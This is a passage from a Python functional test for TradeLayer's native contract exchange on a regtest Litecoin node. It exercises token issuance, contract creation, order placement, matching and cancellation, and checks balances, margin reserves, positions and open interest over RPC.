| 33.753036 | 122 | 0.548639 | 989 | 8,337 | 4.461072 | 0.112235 | 0.036265 | 0.029918 | 0.039891 | 0.80349 | 0.781732 | 0.776745 | 0.776745 | 0.751133 | 0.751133 | 0 | 0.002103 | 0.315701 | 8,337 | 246 | 123 | 33.890244 | 0.771253 | 0 | 0 | 0.78673 | 0 | 0 | 0.105554 | 0.014873 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085308 | false | 0.028436 | 0.009479 | 0 | 0.208531 | 0.028436 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7366cbe060e50f6e929307bc28c368f4fe9fee01 | 43,243 | py | Python | test/functional/tl_natives.py | ogreckoner/BlockPo-to-Tradelayer | e14e8783ba804569946414f2e1706a1f965f6129 | [
"MIT"
] | null | null | null | test/functional/tl_natives.py | ogreckoner/BlockPo-to-Tradelayer | e14e8783ba804569946414f2e1706a1f965f6129 | [
"MIT"
] | 5 | 2021-06-21T21:21:53.000Z | 2021-06-22T20:10:16.000Z | test/functional/tl_natives.py | TradeLayerDesk/BlockPo-to-Tradelayer | e14e8783ba804569946414f2e1706a1f965f6129 | [
"MIT"
] | 1 | 2021-06-21T21:14:45.000Z | 2021-06-21T21:14:45.000Z | #!/usr/bin/env python3
# Copyright (c) 2015-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test ContractDEx functions (natives)."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import os
import json
import http.client
import urllib.parse
class NativesBasicsTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.extra_args = [["-txindex=1"]]
def setup_chain(self):
super().setup_chain()
        # Append rpcauth to litecoin.conf before initialization
rpcauth = "rpcauth=rt:93648e835a54c573682c2eb19f882535$7681e9c5b74bdd85e78166031d2058e1069b3ed7ed967c93fc63abba06f31144"
rpcuser = "rpcuser=rpcuser💻"
rpcpassword = "rpcpassword=rpcpassword🔑"
with open(os.path.join(self.options.tmpdir+"/node0", "litecoin.conf"), 'a', encoding='utf8') as f:
f.write(rpcauth+"\n")
def run_test(self):
self.log.info("Preparing the workspace...")
# mining 200 blocks
self.nodes[0].generate(200)
################################################################################
# Checking RPC tl_sendtrade (in the first 200 blocks of the chain) #
################################################################################
url = urllib.parse.urlparse(self.nodes[0].url)
#Old authpair
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
addresses = []
accounts = ["john", "doe", "another"]
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
self.log.info("Creating sender address")
addresses = tradelayer_createAddresses(accounts, conn, headers)
self.log.info("Funding addresses with LTC")
amount = 1.1
tradelayer_fundingAddresses(addresses, amount, conn, headers)
self.log.info("Checking the LTC balance in every account")
tradelayer_checkingBalance(accounts, amount, conn, headers)
self.log.info("Creating new tokens (lihki)")
array = [0]
params = str([addresses[0],2,0,"lihki","","","100000",array]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_sendissuancefixed",params)
assert_equal(out['error'], None)
# self.log.info(out)
self.nodes[0].generate(1)
self.log.info("Self Attestation for addresses")
tradelayer_selfAttestation(addresses,conn, headers)
self.log.info("Checking attestations")
out = tradelayer_HTTP(conn, headers, False, "tl_list_attestation")
# self.log.info(out)
result = []
registers = out['result']
for addr in addresses:
for i in registers:
if i['att sender'] == addr and i['att receiver'] == addr and i['kyc_id'] == 0:
result.append(True)
assert_equal(result, [True, True, True])
self.log.info("Checking the property: lihki")
params = str([4])
out = tradelayer_HTTP(conn, headers, True, "tl_getproperty",params)
assert_equal(out['error'], None)
# self.log.info(out)
assert_equal(out['result']['propertyid'],4)
assert_equal(out['result']['name'],'lihki')
assert_equal(out['result']['data'],'')
assert_equal(out['result']['url'],'')
assert_equal(out['result']['divisible'],True)
assert_equal(out['result']['totaltokens'],'100000.00000000')
self.log.info("Checking tokens balance in lihki's owner ")
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getbalance",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['balance'],'100000.00000000')
assert_equal(out['result']['reserve'],'0.00000000')
self.log.info("Sending 50000 tokens to second address")
params = str([addresses[0], addresses[1], 4, "50000"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_send",params)
assert_equal(out['error'], None)
# self.log.info(out)
self.nodes[0].generate(1)
self.log.info("Checking tokens in receiver address")
params = str([addresses[1], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getbalance",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['balance'],'50000.00000000')
assert_equal(out['result']['reserve'],'0.00000000')
self.log.info("Creating native Contract")
array = [0]
params = str([addresses[0], 1, 4, "ALL/Lhk", 1000, "1", 4, "0.1", 0, array]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_createcontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking the native contract")
params = str([5])
out = tradelayer_HTTP(conn, headers, True, "tl_getproperty",params)
assert_equal(out['error'], None)
# self.log.info(out)
assert_equal(out['result']['propertyid'],5)
assert_equal(out['result']['name'],'ALL/Lhk')
assert_equal(out['result']['issuer'], addresses[0])
assert_equal(out['result']['notional size'], '1')
assert_equal(out['result']['collateral currency'], '4')
assert_equal(out['result']['margin requirement'], '0.1')
assert_equal(out['result']['blocks until expiration'], '1000')
assert_equal(out['result']['inverse quoted'], '0')
#NOTE: we need to test this for all leverages
self.log.info("Buying contracts")
params = str([addresses[1], "ALL/Lhk", "1000", "780.5", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
        txid = str(out['result']).replace("'","")
        # self.log.info(txid)
self.nodes[0].generate(1)
self.log.info("Checking colateral balance now in sender address")
params = str([addresses[1], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getbalance",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['balance'],'49899.99000000')
assert_equal(out['result']['reserve'],'100.01000000')
self.log.info("Checking orderbook")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[1])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '780.50000000')
assert_equal(out['result'][0]['block'], 206)
self.log.info("Canceling Contract order")
address = '"'+addresses[1]+'"'
params = str([addresses[1], hash]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_sendcancel_contract_order",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'], [])
#NOTE: we need to test this for all leverages
self.log.info("Checking restored colateral in sender address")
params = str([addresses[1], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getbalance",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['balance'],'50000.00000000')
assert_equal(out['result']['reserve'],'0.00000000')
self.log.info("Buying contracts again")
params = str([addresses[1], "ALL/Lhk", "1000", "980.5", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
        txid = str(out['result']).replace("'","")
self.nodes[0].generate(1)
self.log.info("Checking orderbook")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[1])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '980.50000000')
# assert_equal(out['result'][0]['block'], 206)
self.log.info("Another address selling contracts")
params = str([addresses[0], "ALL/Lhk", "1000", "980.5", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'100.00000000')
self.log.info("Checking orderbook")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'],[])
self.log.info("Checking position in first address")
params = str([addresses[1], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], 1000)
self.log.info("Checking position in second address")
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], -1000)
self.log.info("Checking the open interest")
params = str(["ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getopen_interest",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['totalLives'], 1000)
self.log.info("Checking when the price does not match")
self.log.info("Buying contracts at price 100.3")
params = str([addresses[1], "ALL/Lhk", "1000", "100.3", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
        txid = str(out['result']).replace("'","")
self.nodes[0].generate(1)
self.log.info("Checking orderbook (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[1])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '100.30000000')
# assert_equal(out['result'][0]['block'], 206)
self.log.info("Another address selling contracts at 900.1")
params = str([addresses[0], "ALL/Lhk", "1000", "900.1", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'200.01000000')
self.log.info("Checking orderbook (sell side)")
params = str(["ALL/Lhk", 2]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[0])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 2)
assert_equal(out['result'][0]['effectiveprice'], '900.10000000')
# assert_equal(out['result'][0]['block'], 206)
self.log.info("Cancel orders using tl_cancelallcontractsbyaddress")
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_cancelallcontractsbyaddress",params)
# self.log.info(out)
assert_equal(out['error'], None)
params = str([addresses[1], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_cancelallcontractsbyaddress",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'100.00000000')
self.log.info("Checking orderbook (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'],[])
self.log.info("Checking orderbook (sell side)")
params = str(["ALL/Lhk", 2]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'],[])
self.log.info("Sending a new buy order")
params = str([addresses[1], "ALL/Lhk", "1000", "100.9", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
        txid = str(out['result']).replace("'","")
self.nodes[0].generate(1)
self.log.info("Checking orderbook (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[1])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '100.90000000')
assert_equal(out['result'][0]['block'], 213)
assert_equal(out['result'][0]['idx'], 1)
idx = out['result'][0]['idx']
block = out['result'][0]['block']
self.log.info("Canceling using tl_cancelorderbyblock")
params = str([addresses[1], block, idx]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_cancelorderbyblock",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'],[])
self.log.info("Checking the partial fill")
self.log.info("Sending buy order")
params = str([addresses[0], "ALL/Lhk", "1000", "800.1", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'200.01000000')
self.log.info("Checking orderbook (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[0])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '800.10000000')
assert_equal(out['result'][0]['block'], 215)
assert_equal(out['result'][0]['idx'], 1)
self.log.info("Sending sell order")
params = str([addresses[1], "ALL/Lhk", "500", "800.1", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking position in addresses")
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], -500)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'200.01000000')
params = str([addresses[1], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], 500)
self.log.info("Checking the open interest")
params = str(["ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getopen_interest",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['totalLives'], 500)
self.log.info("Checking orderbook again (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[0])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 500)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '800.10000000')
assert_equal(out['result'][0]['block'], 215)
assert_equal(out['result'][0]['idx'], 1)
self.log.info("Putting order without collateral")
self.log.info("Sending sell order")
params = str([addresses[2], "ALL/Lhk", "300", "800.1", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error']['message'], 'Sender has insufficient balance for collateral')
self.log.info("Sending sell order with more than max leverage")
params = str([addresses[1], "ALL/Lhk", "500", "800.1", 2, "1000"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error']['message'], 'Leverage out of range')
self.log.info("Checking trading against yourself")
self.log.info("Sending buy sell")
params = str([addresses[0], "ALL/Lhk", "500", "800.1", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_tradecontract",params)
# self.log.info(out)
# assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook again (sell side)")
params = str(["ALL/Lhk", 2]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[0])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 500)
assert_equal(out['result'][0]['tradingaction'], 2)
assert_equal(out['result'][0]['effectiveprice'], '800.10000000')
assert_equal(out['result'][0]['block'], 217)
assert_equal(out['result'][0]['idx'], 1)
self.log.info("Cancel orders using tl_cancelallcontractsbyaddress")
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_cancelallcontractsbyaddress",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'100.00000000')
self.log.info("Checking orderbook again (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'], [])
self.log.info("Checking orderbook again (sell side)")
params = str(["ALL/Lhk", 2]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'], [])
self.log.info("Closing positions")
self.log.info("Preparing the orderbook")
params = str([addresses[1], "ALL/Lhk", "500", "500.1", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], -500)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'100.00000000')
params = str([addresses[0], 5]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_closeposition",params)
# self.log.info(out)
# assert_equal(out['error'], None)
self.nodes[0].generate(1)
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], 0)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'0.00000000')
self.log.info("Checking margins for short and long position")
params = str([addresses[0], "ALL/Lhk", "500", "500.1", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
params = str([addresses[1], "ALL/Lhk", "500", "500.1", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], 500)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'50.00500000')
params = str([addresses[1], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], -500)
params = str([addresses[2], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], 0)
self.log.info("Checking the open interest")
params = str(["ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getopen_interest",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['totalLives'], 500)
self.log.info("Sending 2000 tokens to third address")
params = str([addresses[0], addresses[2], 4, "2000"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_send",params)
assert_equal(out['error'], None)
# self.log.info(out)
self.nodes[0].generate(1)
params = str([addresses[2], "ALL/Lhk", "1000", "400.1", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("First address from long to short position")
params = str([addresses[0], "ALL/Lhk", "1000", "400.1", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], -500)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'150.00500000')
params = str([addresses[2], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], 1000)
self.log.info("Checking the open interest")
params = str(["ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getopen_interest",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['totalLives'], 1000)
self.log.info("Checking orderbook again (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'], [])
self.log.info("Checking orderbook again (sell side)")
params = str(["ALL/Lhk", 2]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'], [])
self.log.info("Testing order stack (different blocks)")
for i in range(5):
params = str([addresses[0], "ALL/Lhk", "1000", "100.2", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook again (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[0])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '100.20000000')
assert_equal(out['result'][0]['block'], 226)
assert_equal(out['result'][0]['idx'], 1)
assert_equal(out['result'][1]['address'], addresses[0])
assert_equal(out['result'][1]['contractid'], 5)
assert_equal(out['result'][1]['amountforsale'], 1000)
assert_equal(out['result'][1]['tradingaction'], 1)
assert_equal(out['result'][1]['effectiveprice'], '100.20000000')
assert_equal(out['result'][1]['block'], 227)
assert_equal(out['result'][1]['idx'], 1)
assert_equal(out['result'][2]['address'], addresses[0])
assert_equal(out['result'][2]['contractid'], 5)
assert_equal(out['result'][2]['amountforsale'], 1000)
assert_equal(out['result'][2]['tradingaction'], 1)
assert_equal(out['result'][2]['effectiveprice'], '100.20000000')
assert_equal(out['result'][2]['block'], 228)
assert_equal(out['result'][2]['idx'], 1)
assert_equal(out['result'][3]['address'], addresses[0])
assert_equal(out['result'][3]['contractid'], 5)
assert_equal(out['result'][3]['amountforsale'], 1000)
assert_equal(out['result'][3]['tradingaction'], 1)
assert_equal(out['result'][3]['effectiveprice'], '100.20000000')
assert_equal(out['result'][3]['block'], 229)
assert_equal(out['result'][3]['idx'], 1)
assert_equal(out['result'][4]['address'], addresses[0])
assert_equal(out['result'][4]['contractid'], 5)
assert_equal(out['result'][4]['amountforsale'], 1000)
assert_equal(out['result'][4]['tradingaction'], 1)
assert_equal(out['result'][4]['effectiveprice'], '100.20000000')
assert_equal(out['result'][4]['block'], 230)
assert_equal(out['result'][4]['idx'], 1)
params = str([addresses[1], "ALL/Lhk", "1000", "100.2", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking the open interest")
params = str(["ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getopen_interest",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['totalLives'], 1500)
self.log.info("Checking orderbook again (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'][0]['address'], addresses[0])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '100.20000000')
assert_equal(out['result'][0]['block'], 227)
assert_equal(out['result'][0]['idx'], 1)
assert_equal(out['result'][1]['address'], addresses[0])
assert_equal(out['result'][1]['contractid'], 5)
assert_equal(out['result'][1]['amountforsale'], 1000)
assert_equal(out['result'][1]['tradingaction'], 1)
assert_equal(out['result'][1]['effectiveprice'], '100.20000000')
assert_equal(out['result'][1]['block'], 228)
assert_equal(out['result'][1]['idx'], 1)
assert_equal(out['result'][2]['address'], addresses[0])
assert_equal(out['result'][2]['contractid'], 5)
assert_equal(out['result'][2]['amountforsale'], 1000)
assert_equal(out['result'][2]['tradingaction'], 1)
assert_equal(out['result'][2]['effectiveprice'], '100.20000000')
assert_equal(out['result'][2]['block'], 229)
assert_equal(out['result'][2]['idx'], 1)
assert_equal(out['result'][3]['address'], addresses[0])
assert_equal(out['result'][3]['contractid'], 5)
assert_equal(out['result'][3]['amountforsale'], 1000)
assert_equal(out['result'][3]['tradingaction'], 1)
assert_equal(out['result'][3]['effectiveprice'], '100.20000000')
assert_equal(out['result'][3]['block'], 230)
assert_equal(out['result'][3]['idx'], 1)
self.log.info("Cleaning orderbook")
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_cancelallcontractsbyaddress",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook again")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['result'], [])
self.log.info("Testing order stack (different idx)")
for i in range(5):
params = str([addresses[0], "ALL/Lhk", "1000", "200.3", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
